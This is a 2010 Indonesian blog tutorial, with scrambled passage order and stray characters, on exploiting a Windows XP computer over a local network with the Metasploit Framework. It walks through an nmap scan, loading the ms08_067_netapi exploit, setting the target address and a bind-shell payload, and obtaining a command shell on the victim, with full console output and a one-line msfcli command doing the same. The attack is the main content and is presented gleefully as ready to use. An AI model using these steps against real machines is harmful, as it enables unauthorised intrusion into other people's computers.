Dasar-dasar menggunakan metasploit framework

Posted by neokiddy on 13 March, 2010 7 Comments This item was filled under [ Exploit ] Semalam neo dah praktek sekarang giliran deh neo buat ngeshare Kelebihan yg paling neo senang dari tool ini kita nggak perlu harus melakukan sentuhan fisik terhadap komputer target victim Neo bakal kasi tau gimana cara meng -exploit komputer lain dalam satu jaringan. dengan menggunakan Metasploit Framework (msf), kali ini neo makek msf versi 3.3.3 yg dapat di download disini : http://www.metasploit.com/framework/download/ Install jg nmapnya yah, nmap sudah sudah tersedia dalam satu paket dengan msf 3.3.3 Biar nggak panjang lebar, langsung deh neo kasi tutornya :
y

Buka metasploit console, bagi komputer kalian yg masi jadul kayak kompi neo sabar dulu sampek muncul gambar kyk gini

y

untuk mengetahui perintah-perintahnya ketik ³help´(tanpa tanda petik)

neo cuman akan menunjukkan salah satunya. silahkan cari di google banyak kebetulan neo mempunyai target victim dengan ip 192. kita tentukan victim yang akan kita exploitasi. untuk toolnya gunakan ip scanner. Selanjutnya. ketik ³show exploits´ (tanpa tanda petik) Ada puluhan bahkan ratusan macam-macam exploit yang terkandung.y Untuk mengetahui macam-macam exploit yang terkandung di dalam msf. lihat gambar di bawah : masukkan ip target : kemudian scan.168.1.201 kemudian buka nmap. hasilnya : . untuk selanjutnya terserah kalian . nmap berperan untuk scanning port yg terbuka.

perintahnya ³set rhost ip target´ : .Dari hasil scanning dapat dilihat. untuk perintahnya gunakan ³use´ sehingga terlihat seperti gambar berikut : Untuk melihat dari opsi exploit ini gunakan perintah ³show options´ : Dari opsi diatas kita perlu meng-set RHOST. Mari kita gunakan exploit windows/smb/ms08_067_netapi. target menggunakan OS windows XP dengan port 445 kebuka.

kita tidak tidak perlu meng-set karena jenis vulnerability ini mengexploitasi jenis vulnerability pada port 445. Dan untuk melihat OS apa aja. Untuk exploit target kita gunakan OS komputer target. untuk mengetahui payload apa aja dalam metasploit ketik ³show payloads´ (tanpa tanda petik) . perintahnya ³set payload windows/shell_tcp_bind´ : Atau. kali ini neo menggunakan shell_tcp_bind.Untuk RPORT. ketik ³show targets´ : Sekarang kita tentukan jenis payloadnya.

ketik ³exploit´ lalu tekan enter pelan- Wakakakaakak...Nah. pelan«Xixixixixi«.dengan melihat gambar di atas terlihat neo dah berada pada komputer victim«:-P. misi sukses«. gak percaya«.ssst. untuk melihat hasil konfigurasinya ketik ³show options´ : Ups.!!«coba ketik ipconfig : . kita dah selesai untuk tahap konfigurasinya. neh tahap yg Neo suka«.

. Ingat.well..untuk selanjutnya terserah kalian cukup neo ampek dsini aja.well«.well..:-). tutorial ini jangan disalahgunakan eaa« Salam hangat dari Neo .

dasar" menggunakan metasploit Untuk perintah-perintah lainnya bisa dipelajari dengan mengetikkan help : msf > help Core Commands ============= Command ------? back banner cd connect exit help info irb jobs load loadpath quit resource route save search sessions sessions set setg show sleep unload unset unsetg use version Description ----------Help menu Move back from the current context Display an awesome metasploit banner Change the current working directory Communicate with a host Exit the console Help menu Displays information about one or more module Drop into irb scripting mode Displays and manages jobs Load a framework plugin Searches for and loads modules from a path Exit the console Run the commands stored in a file Route traffic through a session Saves the active datastores Searches module names and descriptions Dump session listings and display information about Sets a variable to a value Sets a global variable to a value Displays modules of a given type. or all modules Do nothing for the specified number of seconds Unload a framework plugin Unsets one or more variables Unsets one or more global variables Selects a module by name Show the framework and console library version numbers .

28 [sudo] password for test:Starting Nmap 4.1.168. gunakan perintah : msf > show exploits List seluruh exploit yang ada kira-kira seperti ini (saya paste sebagian saja biar ndak terlalu panjang) : windows/smb/ms05_039_pnp Overflow windows/smb/ms06_025_rasmans_reg Registry Overflow windows/smb/ms06_025_rras windows/smb/ms06_040_netapi NetpwPathCanonicalize Overflow windows/smb/ms06_066_nwapi nwapi32.Untuk melihat list exploits-nya .62 ( http://nmap. msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > .168.168.1..dll windows/smb/ms08_067_netapi Relative Path Stack Corruption Microsoft Plug and Play Service Microsoft RRAS Service RASMAN Microsoft RRAS Service Overflow Microsoft Server Service Microsoft Services MS06 -066 Microsoft Services MS06 -066 Microsoft Server Service Scan mesin target menggunakan nmap.28 [1 port] Host 192. Mari kita coba kompi ini dengan menggunakan exploit windows/smb/ms08_067_netapi.1.168.1.28 [*] exec: sudo nmap -v -sS -A -O 192. good. Interesting ports on 192.1.168. Dalam contoh kasus kali ini kita gunakan kompi dg ip 192..28 appears to be up . or Windows XP SP2 or SP3 Network Distance: 1 hop TCP Sequence Prediction: Difficult y=258 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OS: Windows Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP dengan port 445-nya terbuka.dll windows/smb/ms06_066_nwwks nwwks.org ) at 2009-03-21 23:50 CIT Initiating ARP Ping Scan at 23:50 Scanning 192.168.1.28 : msf > sudo nmap -v -sS -A -O 192.28: Not shown: 1712 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios -ssn 445/tcp open microsoft -ds Microsoft Windows XP microsoft -ds MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer) Device type: general purpose Running: Microsoft Windows XP OS details: Microsoft Windows 2000 SP4.

28 Untuk RPORT.Lihat opsi dari exploit ini dengan mengetikkan show options : msf exploit(ms08_067_netapi) > show options Module options: Name Current Setting -----------------RHOST RPORT 445 SMBPIPE BROWSER SRVSVC) Exploit target: Id Name -. ketik : msf exploit(ms08_067_netapi) > show targets Exploit targets: Id Name -. Untuk melihat OS target apa saja. maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan mengetikkan : msf exploit(ms08_067_netapi) > set rhost 192.---0 Automatic Targeting Required -------yes yes yes Descript ion ----------The target address Set the SMB service port The pipe name to use (BROWSER. Dalam langkah ini saya ingin menggunakan tcp_bind shell (akses command prompt di kompi target) : msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp payloads => windows/shell_bind_tcp .168. Untuk exploit target diisi dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target.28 rhost => 192.1.168.cut ----------- Sekarang kita tentukan jenis payload yang ingin dipakai. kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 445. Dari opsi diatas.1.---0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows XP SP2 English (NX) 4 Windows XP SP3 En glish (NX) -------.

---0 Automatic Targeting .-----.28 RPORT 445 SMBPIPE BROWSER SRVSVC) Required -------yes yes yes Description ----------The target address Set the SMB service port The pipe name to use (BROWSER. Payload options (windows/shell_bind_tcp): Name Current Setting Required Description -----------..Untuk melihat payload apa saja dalam metasploit.1.28 no The target address Exploit target: Id Name -. Bind TCP Stager (No NX Support) generic/debug_trap/bind_tcp Generic x86 Debug Trap. setting sudah selesai dilakukan. thread. Bind TCP Stager (IPv6) generic/debug_trap/bind_nonx_tcp Generic x86 Debu g Trap. gunakan perintah : msf exploit(ms08_067_netapi) > show payloads Compatible payloads =================== Name Description -------------generic/debug_trap Generic x86 Debug Trap generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap.168.168. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan menggunakan show options : msf exploit(ms08_067_netapi) > show options Module options: Name Current Setting -----------------RHOST 192.1. process LPORT 4444 yes The local port RHOST 192.-------.----------EXITFUNC thread yes Exit technique: seh.dipotong sampai disini --------------- Nahh. Bind TCP Stager ----------.

168.1. . C:\WINDOWS\system32> DNS . . .2600] (C) Copyright 1985 -2001 Microsoft Corp. .. . Untuk melihat manual perintahnya bisa dilihat dari help maupun manpage-nya wiki-nya metasploit.0 . . .1. [*] Fingerprint: Windows XP Service Pack 2 . . . .. .254 Dan ternyata emang masih bolong« :p Metasploit : msfcli Dari langkah-langkah diatas« sebenarnya bisa dilakukan exploitasi dengan menggunakan satu perintah dari console.. .lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Triggering the vulnerability. . : .168. Default Gateway . . Suffix . .. : 255.. . : 192. C:\WINDOWS\system32>ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection -specific IP Address. . dan diakomodir dengan menggunakan msfcli yang notabene sebenarnya adalah metasploit command line interface.255.28:4444) Microsoft Windows XP [Version 5.. . . .sekarang jalankan exploit : msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target.168.1. . . : 192. Subnet Mask .1.6:33270 -> 192. sinchan@hydra:~$ msfcli help [*] Please wait while we load the module tree. . . . Error: Invalid module: --help Usage: /usr/local/bin/msfcli [mode] ================================================================= Mode Description -------------(H)elp You're looking at it baby! (S)ummary Show information about this module (O)ptions Show available options for this module (A)dvanced Show available advanced options for this module (I)DS Evasion Show available ids eva sion options for this module (P)ayloads Show available payloads for this module (T)argets Show available targets for this exploit module (AC)tions Show available actions for this auxiliary module (C)heck Run the check routi ne of the selected module (E)xecute Execute the selected module .168.1.28 . [*] Command shell session 1 opened (192.255.

. . [*] Command shell session 1 opened (192. ...28:4444) Microsoft Windows XP [Version 5.168.28 Port target : 445 Exploit : windows/smb /ms08_067_netapi Payload : windows/shell_bind_tcp Exploit target : 0 Dan implementasinya menjadi seperti ini : sinchan@hydra:~$ msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Triggering the vulnerability. . .255.28 TARGET=0 PAYLOAD=generic/shell_bind_tcp E [*] Please wait while we load the module tree. Silahkan dicoba sendiri karena saya malas upload gambarnya :-p. .1. .168.2600] (C) Copyright 1985 -2001 Microsoft Corp. mari kita coba. IP Address. . . . . Contoh kasusnya sama seperti artikel msfconsole biar ndak capek nulisnya yaitu: IP Addr Target : 192. . Subnet Mask . .1. [*] Started bind handler [*] Automatically detecting the target.1. . . .. . . [*] Fingerprint: Windows XP Service Pack 2 . .255.168.1.1.0 : 192. .168.. .6:36804 -> 192. .1.1. .168. .So. . C:\WINDOWS\system32>ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connect ion: Connection -specific DNS Suffix . .. C:\WINDOWS\system32> : : 192.. .28 : 255. Dari teknik dasar ini silahkan dikembangkan dengan teknik-teknik yang lain. .254 Implementasi yang sama juga bisa dilakukan pada metasploit GUI (msfgui) dan metasploit berbasis web (msfweb). . .168. Default Gateway ..

Sign up to vote on this title
UsefulNot useful